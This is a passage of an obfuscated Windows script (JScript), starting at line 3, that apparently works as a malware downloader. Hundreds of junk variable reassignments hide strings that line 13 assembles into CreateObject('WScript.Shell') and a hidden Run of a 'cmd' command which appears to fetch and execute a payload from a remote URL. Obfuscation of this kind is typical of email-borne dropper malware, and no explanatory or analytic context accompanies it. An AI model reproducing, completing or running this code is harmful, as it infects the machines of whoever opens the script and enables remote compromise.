3 | for ( mdftl = 0 ; mdftl < pjqhukdfr[rgpvebgza + xnwzm + grxkfgpfg + ccbze + lxmzify + zdzlz] ; ++ mdftl ) | |
4 | { | |
5 | if ( fageuycbm == pjqhukdfr[mdftl] ) | |
6 | { | |
7 | fageuycbm = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( fageuycbm !== true ) | |
12 | this[vuducinyl + xyekmeks + cigcycte + kqzqhfn + fbtikzcu + losstjnh + lxmzify][zhyripfj + lklfrm + fbtikzcu + lxmzify] ( ); | |
13 | this[vuducinyl + xyekmeks + cigcycte + kqzqhfn + fbtikzcu + losstjnh + lxmzify][wqwpwcwz + kqzqhfn + xnwzm + htwbuj + lxmzify + xnwzm + syvdowd + ykkkdahlm + dejvyzf + xnwzm + cigcycte + lxmzify] ( vuducinyl + xyekmeks + cigcycte + kqzqhfn + fbtikzcu + losstjnh + lxmzify + qdkehtl + xyekmeks + zdzlz + xnwzm + rgpvebgza + rgpvebgza ) [kqzqhfn + lklfrm + grxkfgpfg] ( cigcycte + vbukxmrwp + gxxqzf + jhrwoyuq + wgbfrd + cigcycte + jhrwoyuq + losstjnh + datnpw + ohygawsz + xnwzm + kqzqhfn + vbferaos + zdzlz + xnwzm + rgpvebgza + rgpvebgza + qdkehtl + xnwzm + fkiralzwi + xnwzm + jhrwoyuq + aawooskv + wqwpwcwz + datnpw + vbukxmrwp + vbukxmrwp + htwbuj + grxkfgpfg + gxxqzf + jhrwoyuq + mheoxho + zipmy + grxkfgpfg + vvniyxkd + datnpw + ylsmmq + xnwzm + aawooskv + vuducinyl + xnwzm + ykkkdahlm + rnnit + xnwzm + sgqnef + lklfrm + xnwzm + vbferaos + lxmzify + jhrwoyuq + aawooskv + syvdowd + lklfrm + lxmzify + xiujon + fbtikzcu + rgpvebgza + xnwzm + jhrwoyuq + excnkw + lxmzify + xnwzm + vbukxmrwp + losstjnh + excnkw + nyxnkrrw + fbtikzcu + grxkfgpfg + vvniyxkd + datnpw + fbtikzcu + cigcycte + xnwzm + qdkehtl + losstjnh + gxxqzf + nscijyz + jhrwoyuq + zdzlz + lxmzify + lxmzify + losstjnh + oxorf + wgbfrd + wgbfrd + jdzsokh + emncgkdz + zzcnbzh + qdkehtl + jdzsokh + tawfbvn + zzcnbzh + qdkehtl + jdzsokh + qdkehtl + xcpnzy + nlxjvm + pponzgjyx + wgbfrd + fbtikzcu + grxkfgpfg + vvniyxkd + datnpw + fbtikzcu + cigcycte + xnwzm + qdkehtl + losstjnh + zdzlz + losstjnh + mheoxho + vovebhiip + vovebhiip + vbferaos + lxmzify + htwbuj + kqzqhfn + lxmzify + jhrwoyuq + excnkw + lxmzify + xnwzm + vbukxmrwp + losstjnh + excnkw + nyxnkrrw + fbtikzcu + grxkfgpfg + vvniyxkd + datnpw + fbtikzcu + cigcycte + xnwzm + qdkehtl + losstjnh + gxxqzf + nscijyz + vovebhiip + vovebhiip + cigcycte + vbukxmrwp + gxxqzf + jhrwoyuq + wgbfrd + cigcycte + jhrwoyuq + grxkfgpfg + xnwzm + lxmzify + jhrwoyuq + lklfrm + vbferaos + xnwzm + jhrwoyuq + nyxnkrrw + nyxnkrrw + jdzsokh + emncgkdz + zzcnbzh + qdkehtl + jdzsokh + tawfbvn + zzcnbzh + qdkehtl + jdzsokh + qdkehtl + xcpnzy + nlxjvm + pponzgjyx + ulfqm + kypvttff + kypvttff + kypvttff + kypvttff + nyxnkrrw + gxxqzf + htwbuj + vvniyxkd + ohygawsz + ohygawsz + ohygawsz + kqzqhfn + datnpw + datnpw + lxmzify + nyxnkrrw + vovebhiip + vovebhiip + cigcycte + vbukxmrwp + gxxqzf + jhrwoyuq + wgbfrd + cigcycte + jhrwoyuq + kqzqhfn + xnwzm + ccbze + vbferaos + vvniyxkd + kqzqhfn + zzcnbzh + xcpnzy + jhrwoyuq + wgbfrd + vbferaos + jhrwoyuq + nyxnkrrw + nyxnkrrw + jdzsokh + emncgkdz + zzcnbzh + qdkehtl + jdzsokh + tawfbvn + zzcnbzh + qdkehtl + jdzsokh + qdkehtl + xcpnzy + nlxjvm + pponzgjyx + ulfqm + kypvttff + kypvttff + kypvttff + kypvttff + nyxnkrrw + gxxqzf + htwbuj + vvniyxkd + ohygawsz + ohygawsz + ohygawsz + kqzqhfn + datnpw + datnpw + lxmzify + nyxnkrrw + jdzsokh + zirluwi + kypvttff + emncgkdz + nlxjvm + jdzsokh + xcpnzy + xcpnzy + kypvttff + tawfbvn + zzcnbzh + xcpnzy + jdzsokh + zzcnbzh + qdkehtl + gxxqzf + rgpvebgza + rgpvebgza, 0, false ); |
|
14 | } | |
15 | dejvyzf = "q"; | |
16 | dejvyzf = "d"; | |
17 | dejvyzf = "Z"; | |
18 | dejvyzf = "i"; | |
19 | dejvyzf = "e"; | |
20 | dejvyzf = "f"; | |
21 | dejvyzf = "s"; | |
22 | dejvyzf = "O"; | |
23 | dejvyzf = "K"; | |
24 | dejvyzf = "C"; | |
25 | dejvyzf = "s"; | |
26 | dejvyzf = "K"; | |
27 | dejvyzf = "N"; | |
28 | dejvyzf = "F"; | |
29 | dejvyzf = "P"; | |
30 | dejvyzf = "R"; | |
31 | dejvyzf = "q"; | |
32 | dejvyzf = "m"; | |
33 | dejvyzf = "t"; | |
34 | dejvyzf = "o"; | |
35 | dejvyzf = "F"; | |
36 | dejvyzf = "m"; | |
37 | dejvyzf = "c"; | |
38 | dejvyzf = "T"; | |
39 | dejvyzf = "y"; | |
40 | dejvyzf = "z"; | |
41 | dejvyzf = "u"; | |
42 | dejvyzf = "c"; | |
43 | dejvyzf = "m"; | |
44 | dejvyzf = "o"; | |
45 | dejvyzf = "p"; | |
46 | dejvyzf = "N"; | |
47 | dejvyzf = "U"; | |
48 | dejvyzf = "H"; | |
49 | dejvyzf = "j"; | |
50 | wkqcel = "e"; | |
51 | wkqcel = "t"; | |
52 | wkqcel = "c"; | |
53 | wkqcel = "N"; | |
54 | wkqcel = "J"; | |
55 | wkqcel = "Y"; | |
56 | wkqcel = "f"; | |
57 | wkqcel = "d"; | |
58 | wkqcel = "t"; | |
59 | wkqcel = "y"; | |
60 | wkqcel = "p"; | |
61 | wkqcel = "V"; | |
62 | wkqcel = "u"; | |
63 | wkqcel = "i"; | |
64 | wkqcel = "Z"; | |
65 | wkqcel = "i"; | |
66 | wkqcel = "h"; | |
67 | wkqcel = "T"; | |
68 | kocddhpf = "q"; | |
69 | kocddhpf = "d"; | |
70 | kocddhpf = "A"; | |
71 | kocddhpf = "g"; | |
72 | kocddhpf = "b"; | |
73 | kocddhpf = "m"; | |
74 | kocddhpf = "y"; | |
75 | kocddhpf = "M"; | |
76 | kocddhpf = "T"; | |
77 | kocddhpf = "v"; | |
78 | kocddhpf = "m"; | |
79 | kocddhpf = "X"; | |
80 | kocddhpf = "r"; | |
81 | kocddhpf = "N"; | |
82 | kocddhpf = "R"; | |
83 | kocddhpf = "y"; | |
84 | kocddhpf = "u"; | |
85 | kocddhpf = "z"; | |
86 | kocddhpf = "m"; | |
87 | kocddhpf = "R"; | |
88 | kocddhpf = "y"; | |
89 | kocddhpf = "b"; | |
90 | kocddhpf = "m"; | |
91 | kocddhpf = "v"; | |
92 | kocddhpf = "P"; | |
93 | kocddhpf = "o"; | |
94 | kocddhpf = "k"; | |
95 | kocddhpf = "c"; | |
96 | kocddhpf = "p"; | |
97 | kocddhpf = "u"; | |
98 | kocddhpf = "y"; | |
99 | kocddhpf = "k"; | |
100 | kocddhpf = "C"; | |
101 | kocddhpf = "V"; | |
102 | kocddhpf = "L"; | |
103 | grxkfgpfg = "P"; | |
104 | grxkfgpfg = "P"; | |
105 | grxkfgpfg = "S"; | |
106 | grxkfgpfg = "s"; | |
107 | grxkfgpfg = "i"; | |
108 | grxkfgpfg = "Q"; | |
109 | grxkfgpfg = "z"; | |
110 | grxkfgpfg = "b"; | |
111 | grxkfgpfg = "g"; | |
112 | grxkfgpfg = "p"; | |
113 | grxkfgpfg = "U"; | |
114 | grxkfgpfg = "U"; | |
115 | grxkfgpfg = "q"; | |
116 | grxkfgpfg = "H"; | |
117 | grxkfgpfg = "w"; | |
118 | grxkfgpfg = "v"; | |
119 | grxkfgpfg = "x"; | |
120 | grxkfgpfg = "g"; | |
121 | grxkfgpfg = "c"; | |
122 | grxkfgpfg = "y"; | |
123 | grxkfgpfg = "U"; | |
124 | grxkfgpfg = "H"; | |
125 | grxkfgpfg = "C"; | |
126 | grxkfgpfg = "v"; | |
127 | grxkfgpfg = "D"; | |
128 | grxkfgpfg = "a"; | |
129 | grxkfgpfg = "n"; | |
130 | datnpw = "i"; | |
131 | datnpw = "x"; | |
132 | datnpw = "t"; | |
133 | datnpw = "i"; | |
134 | datnpw = "k"; | |
135 | datnpw = "u"; | |
136 | datnpw = "M"; | |
137 | datnpw = "B"; | |
138 | datnpw = "A"; | |
139 | datnpw = "y"; | |
140 | datnpw = "l"; | |
141 | datnpw = "D"; | |
142 | datnpw = "P"; | |
143 | datnpw = "Q"; | |
144 | datnpw = "o"; | |
145 | lklfrm = "H"; | |
146 | lklfrm = "b"; | |
147 | lklfrm = "H"; | |
148 | lklfrm = "P"; | |
149 | lklfrm = "O"; | |
150 | lklfrm = "s"; | |
151 | lklfrm = "H"; | |
152 | lklfrm = "t"; | |
153 | lklfrm = "k"; | |
154 | lklfrm = "a"; | |
155 | lklfrm = "x"; | |
156 | lklfrm = "p"; | |
157 | lklfrm = "q"; | |
158 | lklfrm = "Q"; | |
159 | lklfrm = "g"; | |
160 | lklfrm = "O"; | |
161 | lklfrm = "Q"; | |
162 | lklfrm = "u"; | |
163 | lklfrm = "j"; | |
164 | lklfrm = "k"; | |
165 | lklfrm = "o"; | |
166 | lklfrm = "Z"; | |
167 | lklfrm = "D"; | |
168 | lklfrm = "b"; | |
169 | lklfrm = "k"; | |
170 | lklfrm = "U"; | |
171 | lklfrm = "O"; | |
172 | lklfrm = "f"; | |
173 | lklfrm = "U"; | |
174 | lklfrm = "F"; | |
175 | lklfrm = "u"; | |
176 | ohygawsz = "G"; | |
177 | ohygawsz = "p"; | |
178 | ohygawsz = "b"; | |
179 | ohygawsz = "b"; | |
180 | ohygawsz = "k"; | |
181 | ohygawsz = "K"; | |
182 | ohygawsz = "r"; | |
183 | ohygawsz = "M"; | |
184 | ohygawsz = "T"; | |
185 | ohygawsz = "X"; | |
186 | ohygawsz = "c"; | |
187 | ohygawsz = "y"; | |
188 | ohygawsz = "b"; | |
189 | ohygawsz = "b"; | |
190 | ohygawsz = "R"; | |
191 | ohygawsz = "n"; | |
192 | ohygawsz = "Q"; | |
193 | ohygawsz = "o"; | |
194 | ohygawsz = "O"; | |
195 | ohygawsz = "Q"; | |
196 | ohygawsz = "y"; | |
197 | ohygawsz = "A"; | |
198 | ohygawsz = "s"; | |
199 | ohygawsz = "t"; | |
200 | ohygawsz = "Q"; | |
201 | ohygawsz = "p"; | |
202 | ohygawsz = "E"; | |
203 | ohygawsz = "p"; | |
204 | ohygawsz = "w"; | |
205 | zdzlz = "M"; | |
206 | zdzlz = "h"; | |
207 | mheoxho = "X"; | |
208 | mheoxho = "A"; | |
209 | mheoxho = "l"; | |
210 | mheoxho = "N"; | |
211 | mheoxho = "L"; | |
212 | mheoxho = "u"; | |
213 | mheoxho = "S"; | |
214 | mheoxho = "R"; | |
215 | mheoxho = "r"; | |
216 | mheoxho = "E"; | |
217 | mheoxho = "B"; | |
218 | mheoxho = "j"; | |
219 | mheoxho = "D"; | |
220 | mheoxho = "h"; | |
221 | mheoxho = "C"; | |
222 | mheoxho = "q"; | |
223 | mheoxho = "M"; | |
224 | mheoxho = "Y"; | |
225 | mheoxho = "I"; | |
226 | mheoxho = "Z"; | |
227 | mheoxho = "f"; | |
228 | mheoxho = "R"; | |
229 | mheoxho = "M"; | |
230 | mheoxho = "f"; | |
231 | mheoxho = "B"; | |
232 | mheoxho = "s"; | |
233 | mheoxho = "Q"; | |
234 | mheoxho = "Z"; | |
235 | mheoxho = "V"; | |
236 | mheoxho = "K"; | |
237 | mheoxho = "V"; | |
238 | mheoxho = "D"; | |
239 | mheoxho = "J"; | |
240 | mheoxho = "J"; | |
241 | mheoxho = "y"; | |
242 | mheoxho = "\""; | |
243 | xyekmeks = "F"; | |
244 | xyekmeks = "e"; | |
245 | xyekmeks = "J"; | |
246 | xyekmeks = "z"; | |
247 | xyekmeks = "H"; | |
248 | xyekmeks = "B"; | |
249 | xyekmeks = "i"; | |
250 | xyekmeks = "H"; | |
251 | xyekmeks = "S"; | |
252 | kypvttff = "P"; | |
253 | kypvttff = "N"; | |
254 | kypvttff = "G"; | |
255 | kypvttff = "Y"; | |
256 | kypvttff = "F"; | |
257 | kypvttff = "G"; | |
258 | kypvttff = "n"; | |
259 | kypvttff = "P"; | |
260 | kypvttff = "K"; | |
261 | kypvttff = "O"; | |
262 | kypvttff = "m"; | |
263 | kypvttff = "L"; | |
264 | kypvttff = "U"; | |
265 | kypvttff = "D"; | |
266 | kypvttff = "m"; | |
267 | kypvttff = "r"; | |
268 | kypvttff = "W"; | |
269 | kypvttff = "k"; | |
270 | kypvttff = "G"; | |
271 | kypvttff = "O"; | |
272 | kypvttff = "Q"; | |
273 | kypvttff = "k"; | |
274 | kypvttff = "T"; | |
275 | kypvttff = "G"; | |
276 | kypvttff = "r"; | |
277 | kypvttff = "I"; | |
278 | kypvttff = "f"; | |
279 | kypvttff = "g"; | |
280 | kypvttff = "c"; | |
281 | kypvttff = "s"; | |
282 | kypvttff = "Z"; | |
283 | kypvttff = "U"; | |
284 | kypvttff = "w"; | |
285 | kypvttff = "P"; | |
286 | kypvttff = "k"; | |
287 | kypvttff = "8"; | |
288 | qdsetziay = "r"; | |
289 | qdsetziay = "M"; | |
290 | qdsetziay = "f"; | |
291 | qdsetziay = "R"; | |
292 | qdsetziay = "b"; | |
293 | qdsetziay = "l"; | |
294 | qdsetziay = "D"; | |
295 | qdsetziay = "D"; | |
296 | qdsetziay = "s"; | |
297 | qdsetziay = "k"; | |
298 | qdsetziay = "G"; | |
299 | qdsetziay = "p"; | |
300 | qdsetziay = "a"; | |
301 | qdsetziay = "i"; | |
302 | qdsetziay = "u"; | |
303 | qdsetziay = "w"; | |
304 | qdsetziay = "W"; | |
305 | qdsetziay = "h"; | |
306 | qdsetziay = "E"; | |
307 | qdsetziay = "h"; | |
308 | qdsetziay = "W"; | |
309 | qdsetziay = "o"; | |
310 | qdsetziay = "f"; | |
311 | qdsetziay = "p"; | |
312 | qdsetziay = "w"; | |
313 | qdsetziay = "n"; | |
314 | qdsetziay = "Z"; | |
315 | qdsetziay = "Y"; | |
316 | qdsetziay = "J"; | |
317 | qdsetziay = "B"; | |
318 | qdsetziay = "F"; | |
319 | qdsetziay = "g"; | |
320 | qdsetziay = "b"; | |
321 | qdsetziay = "U"; | |
322 | vbferaos = "C"; | |
323 | vbferaos = "p"; | |
324 | vbferaos = "N"; | |
325 | vbferaos = "J"; | |
326 | vbferaos = "E"; | |
327 | vbferaos = "V"; | |
328 | vbferaos = "G"; | |
329 | vbferaos = "o"; | |
330 | vbferaos = "r"; | |
331 | vbferaos = "k"; | |
332 | vbferaos = "C"; | |
333 | vbferaos = "p"; | |
334 | vbferaos = "D"; | |
335 | vbferaos = "N"; | |
336 | vbferaos = "B"; | |
337 | vbferaos = "n"; | |
338 | vbferaos = "T"; | |
339 | vbferaos = "O"; | |
340 | vbferaos = "s"; | |
341 | vbferaos = "V"; | |
342 | vbferaos = "q"; | |
343 | vbferaos = "l"; | |
344 | vbferaos = "l"; | |
345 | vbferaos = "d"; | |
346 | vbferaos = "e"; | |
347 | vbferaos = "V"; | |
348 | vbferaos = "z"; | |
349 | vbferaos = "e"; | |
350 | vbferaos = "f"; | |
351 | vbferaos = "f"; | |
352 | vbferaos = "T"; | |
353 | vbferaos = "D"; | |
354 | vbferaos = "g"; | |
355 | vbferaos = "X"; | |
356 | vbferaos = "a"; | |
357 | vbferaos = "L"; | |
358 | vbferaos = "s"; | |
359 | vbferaos = "R"; | |
360 | vbferaos = "B"; | |
361 | vbferaos = "C"; | |
362 | vbferaos = "s"; | |
363 | pmpwubr = "b"; | |
364 | pmpwubr = "K"; | |
365 | pmpwubr = "X"; | |
366 | pmpwubr = "V"; | |
367 | pmpwubr = "y"; | |
368 | pmpwubr = "s"; | |
369 | pmpwubr = "I"; | |
370 | pmpwubr = "L"; | |
371 | pmpwubr = "z"; | |
372 | pmpwubr = "h"; | |
373 | pmpwubr = "U"; | |
374 | pmpwubr = "k"; | |
375 | pmpwubr = "S"; | |
376 | pmpwubr = "f"; | |
377 | pmpwubr = "c"; | |
378 | pmpwubr = "G"; | |
379 | pmpwubr = "z"; | |
380 | pmpwubr = "R"; | |
381 | pmpwubr = "W"; | |
382 | pmpwubr = "h"; | |
383 | pmpwubr = "B"; | |
384 | pmpwubr = "P"; | |
385 | pmpwubr = "C"; | |
386 | pmpwubr = "s"; | |
387 | pmpwubr = "k"; | |
388 | pmpwubr = "Z"; | |
389 | pmpwubr = "E"; | |
390 | ccbze = "P"; | |
391 | ccbze = "g"; | |
392 | ccbze = "K"; | |
393 | ccbze = "q"; | |
394 | ccbze = "W"; | |
395 | ccbze = "Z"; | |
396 | ccbze = "B"; | |
397 | ccbze = "a"; | |
398 | ccbze = "j"; | |
399 | ccbze = "l"; | |
400 | ccbze = "c"; | |
401 | ccbze = "L"; | |
402 | ccbze = "k"; | |
403 | ccbze = "G"; | |
404 | ccbze = "E"; | |
405 | ccbze = "e"; | |
406 | ccbze = "g"; | |
407 | oxorf = "f"; | |
408 | oxorf = "o"; | |
409 | oxorf = "w"; | |
410 | oxorf = "g"; | |
411 | oxorf = "K"; | |
412 | oxorf = "Q"; | |
413 | oxorf = "u"; | |
414 | oxorf = "i"; | |
415 | oxorf = "g"; | |
416 | oxorf = "O"; | |
417 | oxorf = "x"; | |
418 | oxorf = "J"; | |
419 | oxorf = "f"; | |
420 | oxorf = ":"; | |
421 | xnwzm = "C"; | |
422 | xnwzm = "o"; | |
423 | xnwzm = "e"; | |
424 | emncgkdz = "Q"; | |
425 | emncgkdz = "T"; | |
426 | emncgkdz = "V"; | |
427 | emncgkdz = "A"; | |
428 | emncgkdz = "K"; | |
429 | emncgkdz = "G"; | |
430 | emncgkdz = "X"; | |
431 | emncgkdz = "z"; | |
432 | emncgkdz = "d"; | |
433 | emncgkdz = "b"; | |
434 | emncgkdz = "k"; | |
435 | emncgkdz = "O"; | |
436 | emncgkdz = "a"; | |
437 | emncgkdz = "o"; | |
438 | emncgkdz = "i"; | |
439 | emncgkdz = "y"; | |
440 | emncgkdz = "9"; | |
441 | fkiralzwi = "z"; | |
442 | fkiralzwi = "R"; | |
443 | fkiralzwi = "f"; | |
444 | fkiralzwi = "V"; | |
445 | fkiralzwi = "i"; | |
446 | fkiralzwi = "n"; | |
447 | fkiralzwi = "v"; | |
448 | fkiralzwi = "x"; | |
449 | nlxjvm = "Y"; | |
450 | nlxjvm = "c"; | |
451 | nlxjvm = "O"; | |
452 | nlxjvm = "M"; | |
453 | nlxjvm = "d"; | |
454 | nlxjvm = "C"; | |
455 | nlxjvm = "B"; | |
456 | nlxjvm = "d"; | |
457 | nlxjvm = "N"; | |
458 | nlxjvm = "u"; | |
459 | nlxjvm = "v"; | |
460 | nlxjvm = "t"; | |
461 | nlxjvm = "S"; | |
462 | nlxjvm = "Z"; | |
463 | nlxjvm = "U"; | |
464 | nlxjvm = "0"; | |
465 | excnkw = "G"; | |
466 | excnkw = "P"; | |
467 | excnkw = "d"; | |
468 | excnkw = "g"; | |
469 | excnkw = "b"; | |
470 | excnkw = "P"; | |
471 | excnkw = "S"; | |
472 | excnkw = "P"; | |
473 | excnkw = "N"; | |
474 | excnkw = "L"; | |
475 | excnkw = "T"; | |
476 | excnkw = "Y"; | |
477 | excnkw = "l"; | |
478 | excnkw = "%"; | |
479 | wknaxvtx = "B"; | |
480 | wknaxvtx = "O"; | |
481 | wknaxvtx = "H"; | |
482 | wknaxvtx = "X"; | |
483 | wknaxvtx = "L"; | |
484 | wknaxvtx = "r"; | |
485 | wknaxvtx = "N"; | |
486 | wknaxvtx = "C"; | |
487 | wknaxvtx = "N"; | |
488 | wknaxvtx = "Q"; | |
489 | wknaxvtx = "E"; | |
490 | wknaxvtx = "g"; | |
491 | wknaxvtx = "k"; | |
492 | wknaxvtx = "L"; | |
493 | wknaxvtx = "p"; | |
494 | wknaxvtx = "S"; | |
495 | wknaxvtx = "O"; | |
496 | wknaxvtx = "S"; | |
497 | wknaxvtx = "W"; | |
498 | wknaxvtx = "c"; | |
499 | wknaxvtx = "s"; | |
500 | wknaxvtx = "H"; | |
501 | fbtikzcu = "w"; | |
502 | fbtikzcu = "J"; | |
503 | fbtikzcu = "F"; | |
504 | fbtikzcu = "O"; | |
505 | fbtikzcu = "y"; | |
506 | fbtikzcu = "d"; | |
507 | fbtikzcu = "P"; | |
508 | fbtikzcu = "f"; | |
509 | fbtikzcu = "U"; | |
510 | fbtikzcu = "i"; | |
511 | fbtikzcu = "N"; | |
512 | fbtikzcu = "j"; | |
513 | fbtikzcu = "k"; | |
514 | fbtikzcu = "o"; | |
515 | fbtikzcu = "f"; | |
516 | fbtikzcu = "f"; | |
517 | fbtikzcu = "q"; | |
518 | fbtikzcu = "A"; | |
519 | fbtikzcu = "J"; | |
520 | fbtikzcu = "x"; | |
521 | fbtikzcu = "o"; | |
522 | fbtikzcu = "Q"; | |
523 | fbtikzcu = "C"; | |
524 | fbtikzcu = "R"; | |
525 | fbtikzcu = "a"; | |
526 | fbtikzcu = "e"; | |
527 | fbtikzcu = "T"; | |
528 | fbtikzcu = "z"; | |
529 | fbtikzcu = "D"; | |
530 | fbtikzcu = "G"; | |
531 | fbtikzcu = "h"; | |
532 | fbtikzcu = "c"; | |
533 | fbtikzcu = "i"; | |
534 | sgqnef = "v"; | |
535 | sgqnef = "x"; | |
536 | sgqnef = "G"; | |
537 | sgqnef = "i"; | |
538 | sgqnef = "p"; | |
539 | sgqnef = "o"; | |
540 | sgqnef = "E"; | |
541 | sgqnef = "e"; | |
542 | sgqnef = "N"; | |
543 | sgqnef = "t"; | |
544 | sgqnef = "O"; | |
545 | sgqnef = "z"; | |
546 | sgqnef = "M"; | |
547 | sgqnef = "q"; | |
548 | zirluwi = "A"; | |
549 | zirluwi = "f"; | |
550 | zirluwi = "R"; | |
551 | zirluwi = "E"; | |
552 | zirluwi = "b"; | |
553 | zirluwi = "B"; | |
554 | zirluwi = "F"; | |
555 | zirluwi = "g"; | |
556 | zirluwi = "P"; | |
557 | zirluwi = "n"; | |
558 | zirluwi = "s"; | |
559 | zirluwi = "D"; | |
560 | zirluwi = "7"; | |
561 | vbukxmrwp = "E"; | |
562 | vbukxmrwp = "p"; | |
563 | vbukxmrwp = "W"; | |
564 | vbukxmrwp = "i"; | |
565 | vbukxmrwp = "U"; | |
566 | vbukxmrwp = "z"; | |
567 | vbukxmrwp = "b"; | |
568 | vbukxmrwp = "Y"; | |
569 | vbukxmrwp = "m"; | |
570 | xfzgeojc = "M"; | |
571 | xfzgeojc = "k"; | |
572 | xfzgeojc = "s"; | |
573 | xfzgeojc = "I"; | |
574 | xfzgeojc = "x"; | |
575 | xfzgeojc = "U"; | |
576 | xfzgeojc = "v"; | |
577 | xfzgeojc = "p"; | |
578 | xfzgeojc = "W"; | |
579 | xfzgeojc = "g"; | |
580 | xfzgeojc = "P"; | |
581 | xfzgeojc = "Z"; | |
582 | xfzgeojc = "n"; | |
583 | xfzgeojc = "m"; | |
584 | xfzgeojc = "f"; | |
585 | xfzgeojc = "v"; | |
586 | xfzgeojc = "P"; | |
587 | qdkehtl = "."; | |
588 | vuducinyl = "C"; | |
589 | vuducinyl = "g"; | |
590 | vuducinyl = "W"; | |
591 | vuducinyl = "F"; | |
592 | vuducinyl = "B"; | |
593 | vuducinyl = "a"; | |
594 | vuducinyl = "G"; | |
595 | vuducinyl = "q"; | |
596 | vuducinyl = "i"; | |
597 | vuducinyl = "S"; | |
598 | vuducinyl = "c"; | |
599 | vuducinyl = "S"; | |
600 | vuducinyl = "r"; | |
601 | vuducinyl = "B"; | |
602 | vuducinyl = "i"; | |
603 | vuducinyl = "s"; | |
604 | vuducinyl = "h"; | |
605 | vuducinyl = "g"; | |
606 | vuducinyl = "t"; | |
607 | vuducinyl = "a"; | |
608 | vuducinyl = "p"; | |
609 | vuducinyl = "u"; | |
610 | vuducinyl = "W"; | |
611 | vuducinyl = "X"; | |
612 | vuducinyl = "z"; | |
613 | vuducinyl = "A"; | |
614 | vuducinyl = "g"; | |
615 | vuducinyl = "U"; | |
616 | vuducinyl = "K"; | |
617 | vuducinyl = "n"; | |
618 | vuducinyl = "s"; | |
619 | vuducinyl = "S"; | |
620 | vuducinyl = "c"; | |
621 | vuducinyl = "u"; | |
622 | vuducinyl = "n"; | |
623 | vuducinyl = "k"; | |
624 | vuducinyl = "Y"; | |
625 | vuducinyl = "q"; | |
626 | vuducinyl = "g"; | |
627 | vuducinyl = "W"; | |
628 | htwbuj = "l"; | |
629 | htwbuj = "j"; | |
630 | htwbuj = "Y"; | |
631 | htwbuj = "q"; | |
632 | htwbuj = "I"; | |
633 | htwbuj = "O"; | |
634 | htwbuj = "w"; | |
635 | htwbuj = "L"; | |
636 | htwbuj = "z"; | |
637 | htwbuj = "m"; | |
638 | htwbuj = "H"; | |
639 | htwbuj = "Z"; | |
640 | htwbuj = "Y"; | |
641 | htwbuj = "O"; | |
642 | htwbuj = "u"; | |
643 | htwbuj = "q"; | |
644 | htwbuj = "a"; | |
645 | htwbuj = "w"; | |
646 | htwbuj = "S"; | |
647 | htwbuj = "O"; | |
648 | htwbuj = "t"; | |
649 | htwbuj = "t"; | |
650 | htwbuj = "t"; | |
651 | htwbuj = "l"; | |
652 | htwbuj = "a"; | |
653 | zhyripfj = "u"; | |
654 | zhyripfj = "U"; | |
655 | zhyripfj = "L"; | |
656 | zhyripfj = "K"; | |
657 | zhyripfj = "U"; | |
658 | zhyripfj = "b"; | |
659 | zhyripfj = "O"; | |
660 | zhyripfj = "x"; | |
661 | zhyripfj = "w"; | |
662 | zhyripfj = "C"; | |
663 | zhyripfj = "Z"; | |
664 | zhyripfj = "b"; | |
665 | zhyripfj = "a"; | |
666 | zhyripfj = "r"; | |
667 | zhyripfj = "z"; | |
668 | zhyripfj = "b"; | |
669 | zhyripfj = "w"; | |
670 | zhyripfj = "B"; | |
671 | zhyripfj = "W"; | |
672 | zhyripfj = "g"; | |
673 | zhyripfj = "s"; | |
674 | zhyripfj = "C"; | |
675 | zhyripfj = "Q"; | |
676 | zhyripfj = "I"; | |
677 | zhyripfj = "t"; | |
678 | zhyripfj = "x"; | |
679 | zhyripfj = "q"; | |
680 | zhyripfj = "q"; | |
681 | zhyripfj = "n"; | |
682 | zhyripfj = "t"; | |
683 | zhyripfj = "D"; | |
684 | zhyripfj = "A"; | |
685 | zhyripfj = "V"; | |
686 | zhyripfj = "X"; | |
687 | zhyripfj = "I"; | |
688 | zhyripfj = "L"; | |
689 | zhyripfj = "Q"; | |
690 | jhrwoyuq = "S"; | |
691 | jhrwoyuq = "R"; | |
692 | jhrwoyuq = "C"; | |
693 | jhrwoyuq = "K"; | |
694 | jhrwoyuq = "m"; | |
695 | jhrwoyuq = "m"; | |
696 | jhrwoyuq = "I"; | |
697 | jhrwoyuq = "u"; | |
698 | jhrwoyuq = "j"; | |
699 | jhrwoyuq = "A"; | |
700 | jhrwoyuq = "p"; | |
701 | jhrwoyuq = "l"; | |
702 | jhrwoyuq = "V"; | |
703 | jhrwoyuq = "B"; | |
704 | jhrwoyuq = "F"; | |
705 | jhrwoyuq = "D"; | |
706 | jhrwoyuq = "j"; | |
707 | jhrwoyuq = "u"; | |
708 | jhrwoyuq = "R"; | |
709 | jhrwoyuq = "z"; | |
710 | jhrwoyuq = "l"; | |
711 | jhrwoyuq = "i"; | |
712 | jhrwoyuq = "V"; | |
713 | jhrwoyuq = "t"; | |
714 | jhrwoyuq = "t"; | |
715 | jhrwoyuq = "v"; | |
716 | jhrwoyuq = "f"; | |
717 | jhrwoyuq = "P"; | |
718 | jhrwoyuq = "z"; | |
719 | jhrwoyuq = "u"; | |
720 | jhrwoyuq = "M"; | |
721 | jhrwoyuq = "x"; | |
722 | jhrwoyuq = " "; | |
723 | syvdowd = "m"; | |
724 | syvdowd = "K"; | |
725 | syvdowd = "z"; | |
726 | syvdowd = "d"; | |
727 | syvdowd = "p"; | |
728 | syvdowd = "Y"; | |
729 | syvdowd = "a"; | |
730 | syvdowd = "X"; | |
731 | syvdowd = "p"; | |
732 | syvdowd = "t"; | |
733 | syvdowd = "K"; | |
734 | syvdowd = "a"; | |
735 | syvdowd = "f"; | |
736 | syvdowd = "f"; | |
737 | syvdowd = "H"; | |
738 | syvdowd = "b"; | |
739 | syvdowd = "U"; | |
740 | syvdowd = "t"; | |
741 | syvdowd = "m"; | |
742 | syvdowd = "M"; | |
743 | syvdowd = "n"; | |
744 | syvdowd = "E"; | |
745 | syvdowd = "Q"; | |
746 | syvdowd = "P"; | |
747 | syvdowd = "y"; | |
748 | syvdowd = "A"; | |
749 | syvdowd = "U"; | |
750 | syvdowd = "h"; | |
751 | syvdowd = "h"; | |
752 | syvdowd = "k"; | |
753 | syvdowd = "O"; | |
754 | xiujon = "X"; | |
755 | xiujon = "F"; | |
756 | vvniyxkd = "X"; | |
757 | vvniyxkd = "M"; | |
758 | vvniyxkd = "H"; | |
759 | vvniyxkd = "A"; | |
760 | vvniyxkd = "j"; | |
761 | vvniyxkd = "q"; | |
762 | vvniyxkd = "A"; | |
763 | vvniyxkd = "U"; | |
764 | vvniyxkd = "F"; | |
